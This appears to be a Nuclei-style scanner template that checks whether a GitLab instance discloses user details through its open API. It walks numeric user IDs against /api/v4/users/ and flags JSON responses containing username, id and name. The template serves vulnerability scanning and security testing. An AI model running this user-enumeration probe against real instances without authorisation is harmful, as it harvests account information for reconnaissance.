id: gitlab-api-user-enum

info:
  author: Suman_Kar
  name: GitLab - User Information Disclosure Via Open API
  severity: medium
  reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158
  tags: gitlab,enum,misconfig,disclosure

requests:
  - raw:
      - |
        GET /api/v4/users/{{uid}} HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}

    payloads:
      uid: helpers/wordlists/numbers.txt

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        condition: and
        regex:
          - "username.*"
          - "id.*"
          - "name.*"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200